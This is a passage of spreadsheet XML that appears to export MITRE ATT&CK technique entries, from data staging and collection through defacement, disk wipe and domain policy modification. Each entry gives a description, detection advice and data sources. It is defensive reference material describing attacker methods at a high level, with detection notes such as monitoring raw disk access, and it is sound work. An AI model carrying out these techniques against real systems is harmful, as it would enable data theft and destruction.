    <t>13 March 2020</t>
  </si>
  <si>
    <t>T1074.002</t>
  </si>
  <si>
    <t>Data Staged: Remote Data Staging</t>
  </si>
  <si>
    <t>Adversaries may stage data collected from multiple systems in a central location or directory on one system prior to Exfiltration. Data may be kept in separate files or combined into one file through techniques such as [Archive Collected Data](https://attack.mitre.org/techniques/T1560). Interactive command shells may be used, and common functionality within [cmd](https://attack.mitre.org/software/S0106) and bash may be used to copy data into a staging location.
In cloud environments, adversaries may stage data within a particular instance or virtual machine before exfiltration. An adversary may [Create Cloud Instance](https://attack.mitre.org/techniques/T1578/002) and stage data in that instance.(Citation: Mandiant M-Trends 2020)
By staging data on one system prior to Exfiltration, adversaries can minimize the number of connections made to their C2 server and better evade detection.</t>
  </si>
  <si>
    <t>https://attack.mitre.org/techniques/T1074/002</t>
  </si>
  <si>
    <t>T1030</t>
  </si>
  <si>
    <t>Data Transfer Size Limits</t>
  </si>
  <si>
    <t>An adversary may exfiltrate data in fixed size chunks instead of whole files or limit packet sizes below certain thresholds. This approach may be used to avoid triggering network data transfer threshold alerts.</t>
  </si>
  <si>
    <t>https://attack.mitre.org/techniques/T1030</t>
  </si>
  <si>
    <t>Analyze network data for uncommon data flows (e.g., a client sending significantly more data than it receives from a server). If a process maintains a long connection during which it consistently sends fixed size data packets or a process opens connections and sends fixed sized data packets at regular intervals, it may be performing an aggregate data transfer.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t>
  </si>
  <si>
    <t>T1530</t>
  </si>
  <si>
    <t>Data from Cloud Storage Object</t>
  </si>
  <si>
    <t>Adversaries may access data objects from improperly secured cloud storage.
Many cloud service providers offer solutions for online data storage such as Amazon S3, Azure Storage, and Google Cloud Storage. These solutions differ from other storage solutions (such as SQL or Elasticsearch) in that there is no overarching application. Data from these solutions can be retrieved directly using the cloud provider's APIs. Solution providers typically offer security guides to help end users configure systems.(Citation: Amazon S3 Security, 2019)(Citation: Microsoft Azure Storage Security, 2019)(Citation: Google Cloud Storage Best Practices, 2019)
Misconfiguration by end users is a common problem. There have been numerous incidents where cloud storage has been improperly secured (typically by unintentionally allowing public access by unauthenticated users or overly-broad access by all users), allowing open access to credit cards, personally identifiable information, medical records, and other sensitive information.(Citation: Trend Micro S3 Exposed PII, 2017)(Citation: Wired Magecart S3 Buckets, 2019)(Citation: HIPAA Journal S3 Breach, 2017) Adversaries may also obtain leaked credentials in source repositories, logs, or other means as a way to gain access to cloud storage objects that have access permission controls.</t>
  </si>
  <si>
    <t>https://attack.mitre.org/techniques/T1530</t>
  </si>
  <si>
    <t>Monitor for unusual queries to the cloud provider's storage service. Activity originating from unexpected sources may indicate improper permissions are set that is allowing access to data. Additionally, detecting failed attempts by a user for a certain object, followed by escalation of privileges by the same user, and access to the same object may be an indication of suspicious activity.</t>
  </si>
  <si>
    <t>Cloud Storage: Cloud Storage Access</t>
  </si>
  <si>
    <t>Netskope; Praetorian</t>
  </si>
  <si>
    <t>T1602</t>
  </si>
  <si>
    <t>Data from Configuration Repository</t>
  </si>
  <si>
    <t>Adversaries may collect data related to managed devices from configuration repositories. Configuration repositories are used by management systems in order to configure, manage, and control data on remote systems. Configuration repositories may also facilitate remote access and administration of devices.
Adversaries may target these repositories in order to collect large quantities of sensitive system administration data. Data from configuration repositories may be exposed by various protocols and software and can store a wide variety of data, much of which may align with adversary Discovery objectives.(Citation: US-CERT-TA18-106A)(Citation: US-CERT TA17-156A SNMP Abuse 2017)</t>
  </si>
  <si>
    <t>https://attack.mitre.org/techniques/T1602</t>
  </si>
  <si>
    <t>Identify network traffic sent or received by untrusted hosts or networks that solicits and obtains the configuration information of the queried device.(Citation: Cisco Advisory SNMP v3 Authentication Vulnerabilities)</t>
  </si>
  <si>
    <t>Network Traffic: Network Connection Creation, Network Traffic: Network Traffic Content</t>
  </si>
  <si>
    <t>T1602.002</t>
  </si>
  <si>
    <t>Data from Configuration Repository: Network Device Configuration Dump</t>
  </si>
  <si>
    <t xml:space="preserve">Adversaries may access network configuration files to collect sensitive data about the device and the network. The network configuration is a file containing parameters that determine the operation of the device. The device typically stores an in-memory copy of the configuration while operating, and a separate configuration on non-volatile storage to load after device reset. Adversaries can inspect the configuration files to reveal information about the target network and its layout, the network device and its software, or identifying legitimate accounts and credentials for later use.
Adversaries can use common management tools and protocols, such as Simple Network Management Protocol (SNMP) and Smart Install (SMI), to access network configuration files. (Citation: US-CERT TA18-106A Network Infrastructure Devices 2018) (Citation: Cisco Blog Legacy Device Attacks) These tools may be used to query specific data from a configuration repository or configure the device to export the configuration for later analysis. </t>
  </si>
  <si>
    <t>https://attack.mitre.org/techniques/T1602/002</t>
  </si>
  <si>
    <t>Identify network traffic sent or received by untrusted hosts or networks. Configure signatures to identify strings that may be found in a network device configuration. (Citation: US-CERT TA18-068A 2018)</t>
  </si>
  <si>
    <t>T1602.001</t>
  </si>
  <si>
    <t>Data from Configuration Repository: SNMP (MIB Dump)</t>
  </si>
  <si>
    <t xml:space="preserve">Adversaries may target the Management Information Base (MIB) to collect and/or mine valuable information in a network managed using Simple Network Management Protocol (SNMP).
The MIB is a configuration repository that stores variable information accessible via SNMP in the form of object identifiers (OID). Each OID identifies a variable that can be read or set and permits active management tasks, such as configuration changes, through remote modification of these variables. SNMP can give administrators great insight in their systems, such as, system information, description of hardware, physical location, and software packages(Citation: SANS Information Security Reading Room Securing SNMP Securing SNMP). The MIB may also contain device operational information, including running configuration, routing table, and interface details.
Adversaries may use SNMP queries to collect MIB content directly from SNMP-managed devices in order to collect network information that allows the adversary to build network maps and facilitate future targeted exploitation.(Citation: US-CERT-TA18-106A)(Citation: Cisco Blog Legacy Device Attacks) </t>
  </si>
  <si>
    <t>https://attack.mitre.org/techniques/T1602/001</t>
  </si>
  <si>
    <t>Identify network traffic sent or received by untrusted hosts or networks that expose MIB content or use unauthorized protocols.(Citation: Cisco Advisory SNMP v3 Authentication Vulnerabilities)</t>
  </si>
  <si>
    <t>T1213</t>
  </si>
  <si>
    <t>Data from Information Repositories</t>
  </si>
  <si>
    <t>Adversaries may leverage information repositories to mine valuable information. Information repositories are tools that allow for storage of information, typically to facilitate collaboration or information sharing between users, and can store a wide variety of data that may aid adversaries in further objectives, or direct access to the target information.
The following is a brief list of example information that may hold potential value to an adversary and may also be found on an information repository:
* Policies, procedures, and standards
* Physical / logical network diagrams
* System architecture diagrams
* Technical system documentation
* Testing / development credentials
* Work / project schedules
* Source code snippets
* Links to network shares and other internal resources
Information stored in a repository may vary based on the specific instance or environment. Specific common information repositories include [Sharepoint](https://attack.mitre.org/techniques/T1213/002), [Confluence](https://attack.mitre.org/techniques/T1213/001), and enterprise databases such as SQL Server.</t>
  </si>
  <si>
    <t>https://attack.mitre.org/techniques/T1213</t>
  </si>
  <si>
    <t>3.1</t>
  </si>
  <si>
    <t>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The user access logging within Microsoft's SharePoint can be configured to report access to certain pages and documents. (Citation: Microsoft SharePoint Logging) The user access logging within Atlassian's Confluence can also be configured to report access to certain pages and documents through AccessLogFilter. (Citation: Atlassian Confluence Logging) Additional log storage and analysis infrastructure will likely be required for more robust detection capabilities.</t>
  </si>
  <si>
    <t>Google Workspace, Linux, Office 365, SaaS, Windows, macOS</t>
  </si>
  <si>
    <t>Application Log: Application Log Content, Logon Session: Logon Session Creation</t>
  </si>
  <si>
    <t>Milos Stojadinovic; Praetorian</t>
  </si>
  <si>
    <t>T1213.001</t>
  </si>
  <si>
    <t>Data from Information Repositories: Confluence</t>
  </si>
  <si>
    <t xml:space="preserve">
Adversaries may leverage Confluence repositories to mine valuable information. Often found in development environments alongside Atlassian JIRA, Confluence is generally used to store development-related documentation, however, in general may contain more diverse categories of useful information, such as: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</si>
  <si>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https://attack.mitre.org/techniques/T1213/001</t>
  </si>
  <si>
    <t>14 February 2020</t>
  </si>
  <si>
    <t>Monitor access to Confluence repositories performed by privileged users (for example, Active Directory Domain, Enterprise, or Schema Administrators)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User access logging within Atlassian's Confluence can be configured to report access to certain pages and documents through AccessLogFilter. (Citation: Atlassian Confluence Logging) Additional log storage and analysis infrastructure will likely be required for more robust detection capabilities.</t>
  </si>
  <si>
    <t>SaaS</t>
  </si>
  <si>
    <t>T1213.002</t>
  </si>
  <si>
    <t>Data from Information Repositories: Sharepoint</t>
  </si>
  <si>
    <t xml:space="preserve">Adversaries may leverage the SharePoint repository as a source to mine valuable information. SharePoint will often contain useful information for an adversary to learn about the structure and functionality of the internal network and systems. For example, the following is a list of example information that may hold potential value to an adversary and may also be found on SharePoint:
* Policies, procedures, and standards
* Physical / logical network diagrams
* System architecture diagrams
* Technical system documentation
* Testing / development credentials
* Work / project schedules
* Source code snippets
* Links to network shares and other internal resources
</t>
  </si>
  <si>
    <t>https://attack.mitre.org/techniques/T1213/002</t>
  </si>
  <si>
    <t xml:space="preserve">The user access logging within Microsoft's SharePoint can be configured to report access to certain pages and documents. (Citation: Microsoft SharePoint Logging). As information repositories generally have a considerably large user base, detection of malicious use can be non-trivial. At minimum, access to information repositories performed by privileged users (for example, Active Directory Domain, Enterprise, or Schema Administrators) should be closely monitored and alerted upon, as these types of accounts should not generally used to access information repositories. If the capability exists, it may be of value to monitor and alert on users that are retrieving and viewing a large number of documents and pages; this behavior may be indicative of programmatic means being used to retrieve all data within the repository. In environments with high-maturity, it may be possible to leverage User-Behavioral Analytics (UBA) platforms to detect and alert on user based anomalies. 
</t>
  </si>
  <si>
    <t>T1005</t>
  </si>
  <si>
    <t>Data from Local System</t>
  </si>
  <si>
    <t xml:space="preserve">Adversaries may search local system sources, such as file systems or local databases, to find files of interest and sensitive data prior to Exfiltration.
Adversaries may do this using a [Command and Scripting Interpreter](https://attack.mitre.org/techniques/T1059), such as [cmd](https://attack.mitre.org/software/S0106), which has functionality to interact with the file system to gather information. Some adversaries may also use [Automated Collection](https://attack.mitre.org/techniques/T1119) on the local system.
</t>
  </si>
  <si>
    <t>https://attack.mitre.org/techniques/T1005</t>
  </si>
  <si>
    <t>Monitor processes and command-line arguments for actions that could be taken to collect files from a system.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</si>
  <si>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t>
  </si>
  <si>
    <t>T1039</t>
  </si>
  <si>
    <t>Data from Network Shared Drive</t>
  </si>
  <si>
    <t>Adversaries may search network shares on computers they have compromised to find files of interest. Sensitive data can be collected from remote systems via shared network drives (host shared directory, network file server, etc.) that are accessible from the current system prior to Exfiltration. Interactive command shells may be in use, and common functionality within [cmd](https://attack.mitre.org/software/S0106) may be used to gather information.</t>
  </si>
  <si>
    <t>https://attack.mitre.org/techniques/T1039</t>
  </si>
  <si>
    <t>Monitor processes and command-line arguments for actions that could be taken to collect files from a network share.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</si>
  <si>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Command: Command Execution, File: File Access, Network Share: Network Share Access</t>
  </si>
  <si>
    <t>T1025</t>
  </si>
  <si>
    <t>Data from Removable Media</t>
  </si>
  <si>
    <t>Adversaries may search connected removable media on computers they have compromised to find files of interest. Sensitive data can be collected from any removable media (optical disk drive, USB memory, etc.) connected to the compromised system prior to Exfiltration. Interactive command shells may be in use, and common functionality within [cmd](https://attack.mitre.org/software/S0106) may be used to gather information. 
Some adversaries may also use [Automated Collection](https://attack.mitre.org/techniques/T1119) on removable media.</t>
  </si>
  <si>
    <t>https://attack.mitre.org/techniques/T1025</t>
  </si>
  <si>
    <t>Monitor processes and command-line arguments for actions that could be taken to collect files from a system's connected removable media. Remote access tools with built-in features may interact directly with the Windows API to gather data. Data may also be acquired through Windows system management tools such as [Windows Management Instrumentation](https://attack.mitre.org/techniques/T1047) and [PowerShell](https://attack.mitre.org/techniques/T1059/001).</t>
  </si>
  <si>
    <t>T1491</t>
  </si>
  <si>
    <t>Defacement</t>
  </si>
  <si>
    <t xml:space="preserve">Adversaries may modify visual content available internally or externally to an enterprise network. Reasons for [Defacement](https://attack.mitre.org/techniques/T1491) include delivering messaging, intimidation, or claiming (possibly false) credit for an intrusion. Disturbing or offensive images may be used as a part of [Defacement](https://attack.mitre.org/techniques/T1491) in order to cause user discomfort, or to pressure compliance with accompanying messages. 
</t>
  </si>
  <si>
    <t>https://attack.mitre.org/techniques/T1491</t>
  </si>
  <si>
    <t>08 April 2019</t>
  </si>
  <si>
    <t xml:space="preserve">Monitor internal and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
</t>
  </si>
  <si>
    <t>Application Log: Application Log Content, File: File Creation, File: File Modification, Network Traffic: Network Traffic Content</t>
  </si>
  <si>
    <t>T1491.002</t>
  </si>
  <si>
    <t>Defacement: External Defacement</t>
  </si>
  <si>
    <t>An adversary may deface systems external to an organization in an attempt to deliver messaging, intimidate, or otherwise mislead an organization or users. Externally-facing websites are a common victim of defacement; often targeted by adversary and hacktivist groups in order to push a political message or spread propaganda.(Citation: FireEye Cyber Threats to Media Industries)(Citation: Kevin Mandia Statement to US Senate Committee on Intelligence)(Citation: Anonymous Hackers Deface Russian Govt Site) [External Defacement](https://attack.mitre.org/techniques/T1491/002) may be used as a catalyst to trigger events, or as a response to actions taken by an organization or government. Similarly, website defacement may also be used as setup, or a precursor, for future attacks such as [Drive-by Compromise](https://attack.mitre.org/techniques/T1189).(Citation: Trend Micro Deep Dive Into Defacement)</t>
  </si>
  <si>
    <t>https://attack.mitre.org/techniques/T1491/002</t>
  </si>
  <si>
    <t>Monitor external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</si>
  <si>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T1491.001</t>
  </si>
  <si>
    <t>Defacement: Internal Defacement</t>
  </si>
  <si>
    <t>An adversary may deface systems internal to an organization in an attempt to intimidate or mislead users. This may take the form of modifications to internal websites, or directly to user systems with the replacement of the desktop wallpaper.(Citation: Novetta Blockbuster) Disturbing or offensive images may be used as a part of [Internal Defacement](https://attack.mitre.org/techniques/T1491/001) in order to cause user discomfort, or to pressure compliance with accompanying messages. Since internally defacing systems exposes an adversary's presence, it often takes place after other intrusion goals have been accomplished.(Citation: Novetta Blockbuster Destructive Malware)</t>
  </si>
  <si>
    <t>https://attack.mitre.org/techniques/T1491/001</t>
  </si>
  <si>
    <t>Monitor internal and websites for unplanned content changes. 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</si>
  <si>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T1140</t>
  </si>
  <si>
    <t>Deobfuscate/Decode Files or Information</t>
  </si>
  <si>
    <t>Adversaries may use [Obfuscated Files or Information](https://attack.mitre.org/techniques/T1027) to hide artifacts of an intrusion from analysis. They may require separate mechanisms to decode or deobfuscate that information depending on how they intend to use it. Methods for doing that include built-in functionality of malware or by using utilities present on the system.
One such example is use of [certutil](https://attack.mitre.org/software/S0160) to decode a remote access tool portable executable file that has been hidden inside a certificate file. (Citation: Malwarebytes Targeted Attack against Saudi Arabia) Another example is using the Windows &lt;code&gt;copy /b&lt;/code&gt; command to reassemble binary fragments into a malicious payload. (Citation: Carbon Black Obfuscation Sept 2016)
Sometimes a user's action may be required to open it for deobfuscation or decryption as part of [User Execution](https://attack.mitre.org/techniques/T1204). The user may also be required to input a password to open a password protected compressed/encrypted file that was provided by the adversary. (Citation: Volexity PowerDuke November 2016)</t>
  </si>
  <si>
    <t>https://attack.mitre.org/techniques/T1140</t>
  </si>
  <si>
    <t>09 July 2020</t>
  </si>
  <si>
    <t>Detecting the action of deobfuscating or decoding files or information may be difficult depending on the implementation. If the functionality is contained within malware and uses the Windows API, then attempting to detect malicious behavior before or after the action may yield better results than attempting to perform analysis on loaded libraries or API calls. If scripts are used, then collecting the scripts for analysis may be necessary. Perform process and command-line monitoring to detect potentially malicious behavior related to scripts and system utilities such as [certutil](https://attack.mitre.org/software/S0160).
Monitor the execution file paths and command-line arguments for common archive file applications and extensions, such as those for Zip and RAR archive tools, and correlate with other suspicious behavior to reduce false positives from normal user and administrator behavior.</t>
  </si>
  <si>
    <t>File: File Modification, Process: Process Creation, Script: Script Execution</t>
  </si>
  <si>
    <t>Matthew Demaske, Adaptforward; Red Canary</t>
  </si>
  <si>
    <t>Anti-virus, Host intrusion prevention systems, Network intrusion detection system, Signature-based detection</t>
  </si>
  <si>
    <t>T1610</t>
  </si>
  <si>
    <t>Deploy Container</t>
  </si>
  <si>
    <t>Adversaries may deploy a container into an environment to facilitate execution or evade defenses. In some cases, adversaries may deploy a new container to execute processes associated with a particular image or deployment, such as processes that execute or download malware. In others, an adversary may deploy a new container configured without network rules, user limitations, etc. to bypass existing defenses within the environment.
Containers can be deployed by various means, such as via Docker's &lt;code&gt;create&lt;/code&gt; and &lt;code&gt;start&lt;/code&gt; APIs or via a web application such as the Kubernetes dashboard or Kubeflow.(Citation: Docker Containers API)(Citation: Kubernetes Dashboard)(Citation: Kubeflow Pipelines) Adversaries may deploy containers based on retrieved or built malicious images or from benign images that download and execute malicious payloads at runtime.(Citation: Aqua Build Images on Hosts)</t>
  </si>
  <si>
    <t>https://attack.mitre.org/techniques/T1610</t>
  </si>
  <si>
    <t>Defense Evasion, Execution</t>
  </si>
  <si>
    <t>Monitor for suspicious or unknown container images and pods in your environment. Deploy logging agents on Kubernetes nodes and retrieve logs from sidecar proxies for application pods to detect malicious activity at the cluster level. In Docker, the daemon log provides insight into remote API calls, including those that deploy containers. Logs for management services or applications used to deploy containers other than the native technologies themselves should also be monitored.</t>
  </si>
  <si>
    <t>Application Log: Application Log Content, Container: Container Creation, Container: Container Start, Pod: Pod Creation, Pod: Pod Modification</t>
  </si>
  <si>
    <t>Alfredo Oliveira, Trend Micro; Ariel Shuper, Cisco; Center for Threat-Informed Defense (CTID); Idan Frimark, Cisco; Magno Logan, @magnologan, Trend Micro; Pawan Kinger, @kingerpawan, Trend Micro; Vishwas Manral, McAfee; Yossi Weizman, Azure Defender Research Team</t>
  </si>
  <si>
    <t>T1587</t>
  </si>
  <si>
    <t>Develop Capabilities</t>
  </si>
  <si>
    <t>Adversaries may build capabilities that can be used during targeting. Rather than purchasing, freely downloading, or stealing capabilities, adversaries may develop their own capabilities in-house. This is the process of identifying development requirements and building solutions such as malware, exploits, and self-signed certificates. Adversaries may develop capabilities to support their operations throughout numerous phases of the adversary lifecycle.(Citation: Mandiant APT1)(Citation: Kaspersky Sofacy)(Citation: Bitdefender StrongPity June 2020)(Citation: Talos Promethium June 2020)
As with legitimate development efforts, different skill sets may be required for developing capabilities. The skills needed may be located in-house, or may need to be contracted out. Use of a contractor may be considered an extension of that adversary's development capabilities, provided the adversary plays a role in shaping requirements and maintains a degree of exclusivity to the capability.</t>
  </si>
  <si>
    <t>https://attack.mitre.org/techniques/T1587</t>
  </si>
  <si>
    <t>Much of this activity will take place outside the visibility of the target organization, making detection of this behavior difficult. Detection efforts may be focused on related stages of the adversary lifecycle, such as during Defense Evasion or Command and Control.</t>
  </si>
  <si>
    <t>T1587.002</t>
  </si>
  <si>
    <t>Develop Capabilities: Code Signing Certificates</t>
  </si>
  <si>
    <t>Adversaries may create self-signed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develop self-signed code signing certificates for use in operations.</t>
  </si>
  <si>
    <t>https://attack.mitre.org/techniques/T1587/002</t>
  </si>
  <si>
    <t>Much of this activity will take place outside the visibility of the target organization, making detection of this behavior difficult. Detection efforts may be focused on related follow-on behavior, such as [Code Signing](https://attack.mitre.org/techniques/T1553/002) or [Install Root Certificate](https://attack.mitre.org/techniques/T1553/004).</t>
  </si>
  <si>
    <t>T1587.003</t>
  </si>
  <si>
    <t>Develop Capabilities: Digital Certificates</t>
  </si>
  <si>
    <t>Adversaries may create self-signed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In the case of self-signing, digital certificates will lack the element of trust associated with the signature of a third-party certificate authority (CA).
Adversaries may create self-signed SSL/TLS certificates that can be used to further their operations, such as encrypting C2 traffic (ex: [Asymmetric Cryptography](https://attack.mitre.org/techniques/T1573/002) with [Web Protocols](https://attack.mitre.org/techniques/T1071/001)) or even enabling [Man-in-the-Middle](https://attack.mitre.org/techniques/T1557) if added to the root of trust (i.e. [Install Root Certificate](https://attack.mitre.org/techniques/T1553/004)).
After creating a digital certificate, an adversary may then install that certificate (see [Install Digital Certificate](https://attack.mitre.org/techniques/T1608/003)) on infrastructure under their control.</t>
  </si>
  <si>
    <t>https://attack.mitre.org/techniques/T1587/003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</si>
  <si>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[Asymmetric Cryptography](https://attack.mitre.org/techniques/T1573/002), and/or [Install Root Certificate](https://attack.mitre.org/techniques/T1553/004).</t>
  </si>
  <si>
    <t>T1587.004</t>
  </si>
  <si>
    <t>Develop Capabilities: Exploits</t>
  </si>
  <si>
    <t>Adversaries may develop exploits that can be used during targeting. An exploit takes advantage of a bug or vulnerability in order to cause unintended or unanticipated behavior to occur on computer hardware or software. Rather than finding/modifying exploits from online or purchasing them from exploit vendors, an adversary may develop their own exploits.(Citation: NYTStuxnet) Adversaries may use information acquired via [Vulnerabilities](https://attack.mitre.org/techniques/T1588/006) to focus exploit development efforts. As part of the exploit development process, adversaries may uncover exploitable vulnerabilities through methods such as fuzzing and patch analysis.(Citation: Irongeek Sims BSides 2017)
As with legitimate development efforts, different skill sets may be required for developing exploits. The skills needed may be located in-house, or may need to be contracted out. Use of a contractor may be considered an extension of that adversary's exploit development capabilities, provided the adversary plays a role in shaping requirements and maintains an initial degree of exclusivity to the exploit.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</si>
  <si>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https://attack.mitre.org/techniques/T1587/004</t>
  </si>
  <si>
    <t>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</si>
  <si>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T1587.001</t>
  </si>
  <si>
    <t>Develop Capabilities: Malware</t>
  </si>
  <si>
    <t>Adversaries may develop malware and malware components that can be used during targeting. Building malicious software can include the development of payloads, droppers, post-compromise tools, backdoors (including backdoored images), packers, C2 protocols, and the creation of infected removable media. Adversaries may develop malware to support their operations, creating a means for maintaining control of remote machines, evading defenses, and executing post-compromise behaviors.(Citation: Mandiant APT1)(Citation: Kaspersky Sofacy)(Citation: ActiveMalwareEnergy)(Citation: FBI Flash FIN7 USB)
As with legitimate development efforts, different skill sets may be required for developing malware. The skills needed may be located in-house, or may need to be contracted out. Use of a contractor may be considered an extension of that adversary's malware development capabilities, provided the adversary plays a role in shaping requirements and maintains a degree of exclusivity to the malware.
Some aspects of malware development, such as C2 protocol development, may require adversaries to obtain additional infrastructure. For example, malware developed that will communicate with Twitter for C2, may require use of [Web Services](https://attack.mitre.org/techniques/T1583/006).(Citation: FireEye APT29)</t>
  </si>
  <si>
    <t>https://attack.mitre.org/techniques/T1587/001</t>
  </si>
  <si>
    <t>Much of this activity will take place outside the visibility of the target organization, making detection of this behavior difficult. Detection efforts may be focused on post-compromise phases of the adversary lifecycle.</t>
  </si>
  <si>
    <t>T1006</t>
  </si>
  <si>
    <t>Direct Volume Access</t>
  </si>
  <si>
    <t>Adversaries may directly access a volume to bypass file access controls and file system monitoring. Windows allows programs to have direct access to logical volumes. Programs with direct access may read and write files directly from the drive by analyzing file system data structures. This technique bypasses Windows file access controls as well as file system monitoring tools. (Citation: Hakobyan 2009)
Utilities, such as NinjaCopy, exist to perform these actions in PowerShell. (Citation: Github PowerSploit Ninjacopy)</t>
  </si>
  <si>
    <t>https://attack.mitre.org/techniques/T1006</t>
  </si>
  <si>
    <t>Monitor handle opens on drive volumes that are made by processes to determine when they may directly access logical drives. (Citation: Github PowerSploit Ninjacopy)
Monitor processes and command-line arguments for actions that could be taken to copy files from the logical drive and evade common file system protections. Since this technique may also be used through [PowerShell](https://attack.mitre.org/techniques/T1059/001), additional logging of PowerShell scripts is recommended.</t>
  </si>
  <si>
    <t>Command: Command Execution, Drive: Drive Access</t>
  </si>
  <si>
    <t>File monitoring, File system access controls</t>
  </si>
  <si>
    <t>T1561</t>
  </si>
  <si>
    <t>Disk Wipe</t>
  </si>
  <si>
    <t>Adversaries may wipe or corrupt raw disk data on specific systems or in large numbers in a network to interrupt availability to system and network resources. With direct write access to a disk, adversaries may attempt to overwrite portions of disk data. Adversaries may opt to wipe arbitrary portions of disk data and/or wipe disk structures like the master boot record (MBR). A complete wipe of all disk sectors may be attempted.
To maximize impact on the target organization in operations where network-wide availability interruption is the goal, malware used for wiping disks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</si>
  <si>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t>
  </si>
  <si>
    <t>Look for attempts to read/write to sensitive locations like the partition boot sector, master boot record, disk partition table, or BIOS parameter block/superblock. Monitor for direct access read/write attempts using the &lt;code&gt;\\\\.\\&lt;/code&gt; notation.(Citation: Microsoft Sysmon v6 May 2017) Monitor for unusual kernel driver installation activity.</t>
  </si>
  <si>
    <t>Command: Command Execution, Drive: Drive Access, Drive: Drive Modification, Driver: Driver Load, Process: Process Creation</t>
  </si>
  <si>
    <t>T1561.001</t>
  </si>
  <si>
    <t>Disk Wipe: Disk Content Wipe</t>
  </si>
  <si>
    <t>Adversaries may erase the contents of storage devices on specific systems or in large numbers in a network to interrupt availability to system and network resources.
Adversaries may partially or completely overwrite the contents of a storage device rendering the data irrecoverable through the storage interface.(Citation: Novetta Blockbuster)(Citation: Novetta Blockbuster Destructive Malware)(Citation: DOJ Lazarus Sony 2018) Instead of wiping specific disk structures or files, adversaries with destructive intent may wipe arbitrary portions of disk content. To wipe disk content, adversaries may acquire direct access to the hard drive in order to overwrite arbitrarily sized portions of disk with random data.(Citation: Novetta Blockbuster Destructive Malware) Adversaries have been observed leveraging third-party drivers like [RawDisk](https://attack.mitre.org/software/S0364) to directly access disk content.(Citation: Novetta Blockbuster)(Citation: Novetta Blockbuster Destructive Malware) This behavior is distinct from [Data Destruction](https://attack.mitre.org/techniques/T1485) because sections of the disk are erased instead of individual files.
To maximize impact on the target organization in operations where network-wide availability interruption is the goal, malware used for wiping disk content may have worm-like features to propagate across a network by leveraging additional techniques like [Valid Accounts](https://attack.mitre.org/techniques/T1078), [OS Credential Dumping](https://attack.mitre.org/techniques/T1003), and [SMB/Windows Admin Shares](https://attack.mitre.org/techniques/T1021/002).(Citation: Novetta Blockbuster Destructive Malware)</t>
  </si>
  <si>
    <t>https://attack.mitre.org/techniques/T1561/001</t>
  </si>
  <si>
    <t>Look for attempts to read/write to sensitive locations like the partition boot sector or BIOS parameter block/superblock. Monitor for direct access read/write attempts using the &lt;code&gt;\\\\.\\&lt;/code&gt; notation.(Citation: Microsoft Sysmon v6 May 2017) Monitor for unusual kernel driver installation activity.</t>
  </si>
  <si>
    <t>T1561.002</t>
  </si>
  <si>
    <t>Disk Wipe: Disk Structure Wipe</t>
  </si>
  <si>
    <t>Adversaries may corrupt or wipe the disk data structures on a hard drive necessary to boot a system; targeting specific critical systems or in large numbers in a network to interrupt availability to system and network resources. 
Adversaries may attempt to render the system unable to boot by overwriting critical data located in structures such as the master boot record (MBR) or partition table.(Citation: Symantec Shamoon 2012)(Citation: FireEye Shamoon Nov 2016)(Citation: Palo Alto Shamoon Nov 2016)(Citation: Kaspersky StoneDrill 2017)(Citation: Unit 42 Shamoon3 2018) The data contained in disk structures may include the initial executable code for loading an operating system or the location of the file system partitions on disk. If this information is not present, the computer will not be able to load an operating system during the boot process, leaving the computer unavailable. [Disk Structure Wipe](https://attack.mitre.org/techniques/T1561/002) may be performed in isolation, or along with [Disk Content Wipe](https://attack.mitre.org/techniques/T1561/001) if all sectors of a disk are wiped.
To maximize impact on the target organization, malware designed for destroying disk structures may have worm-like features to propagate across a network by leveraging other techniques like [Valid Accounts](https://attack.mitre.org/techniques/T1078), [OS Credential Dumping](https://attack.mitre.org/techniques/T1003), and [SMB/Windows Admin Shares](https://attack.mitre.org/techniques/T1021/002).(Citation: Symantec Shamoon 2012)(Citation: FireEye Shamoon Nov 2016)(Citation: Palo Alto Shamoon Nov 2016)(Citation: Kaspersky StoneDrill 2017)</t>
  </si>
  <si>
    <t>https://attack.mitre.org/techniques/T1561/002</t>
  </si>
  <si>
    <t>Look for attempts to read/write to sensitive locations like the master boot record and the disk partition table. Monitor for direct access read/write attempts using the &lt;code&gt;\\\\.\\&lt;/code&gt; notation.(Citation: Microsoft Sysmon v6 May 2017) Monitor for unusual kernel driver installation activity.</t>
  </si>
  <si>
    <t>T1484</t>
  </si>
  <si>
    <t>Domain Policy Modification</t>
  </si>
  <si>
    <t>Adversaries may modify the configuration settings of a domain to evade defenses and/or escalate privileges in domain environments. Domains provide a centralized means of managing how computer resources (ex: computers, user accounts) can act, and interact with each other, on a network. The policy of the domain also includes configuration settings that may apply between domains in a multi-domain/forest environment. Modifications to domain settings may include altering domain Group Policy Objects (GPOs) or changing trust settings for domains, including federation trusts.
With sufficient permissions, adversaries can modify domain policy settings. Since domain configuration settings control many of the interactions within the Active Directory (AD) environment, there are a great number of potential attacks that can stem from this abuse. Examples of such abuse include modifying GPOs to push a malicious [Scheduled Task](https://attack.mitre.org/techniques/T1053/005) to computers throughout the domain environment(Citation: ADSecurity GPO Persistence 2016)(Citation: Wald0 Guide to GPOs)(Citation: Harmj0y Abusing GPO Permissions) or modifying domain trusts to include an adversary controlled domain where they can control access tokens that will subsequently be accepted by victim domain resources.(Citation: Microsoft - Customer Guidance on Recent Nation-State Cyber Attacks) Adversaries can also change configuration settings within the AD environment to implement a [Rogue Domain Controller](https://attack.mitre.org/techniques/T1207).
Adversaries may temporarily modify domain policy, carry out a malicious action(s), and then revert the change to remove suspicious indicators.</t>
  </si>
  <si>
    <t>https://attack.mitre.org/techniques/T1484</t>
  </si>
  <si>
    <t>07 March 2019</t>
  </si>
  <si>
    <t>It may be possible to detect domain policy modifications using Windows event logs. Group policy modifications, for example, may be logged under a variety of Windows event IDs for modifying, creating, undeleting, moving, and deleting directory service objects (Event ID 5136, 5137, 5138, 5139, 5141 respectively). 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ADFSDomainTrustMods)(Citation: Microsoft 365 Defender Solorigate) This may also include monitoring for Event ID 307 which can be correlated to relevant Event ID 510 with the same Instance ID for change details.(Citation: Sygnia Golden SAML)(Citation: CISA SolarWinds Cloud Detection)
Consider monitoring for commands/cmdlets and command-line arguments that may be leveraged to modify domain policy settings.(Citation: Microsoft - Update or Repair Federated domain) Some domain policy modifications, such as changes to federation settings, are likely to be rare.(Citation: Microsoft 365 Defender Solorigate)</t>
  </si>
  <si>
    <t>Azure AD, Windows</t>
  </si>
  <si>
    <t>Active Directory: Active Directory Object Creation, Active Directory: Active Directory Object Deletion, Active Directory: Active Directory Object Modification, Command: Command Execution</t>
  </si>
  <si>
    <t>File system access controls, System access controls</t>
  </si>
  <si>
    <t>T1484.002</t>
  </si>
  <si>
    <t>Domain Policy Modification: Domain Trust Modification</t>
  </si>
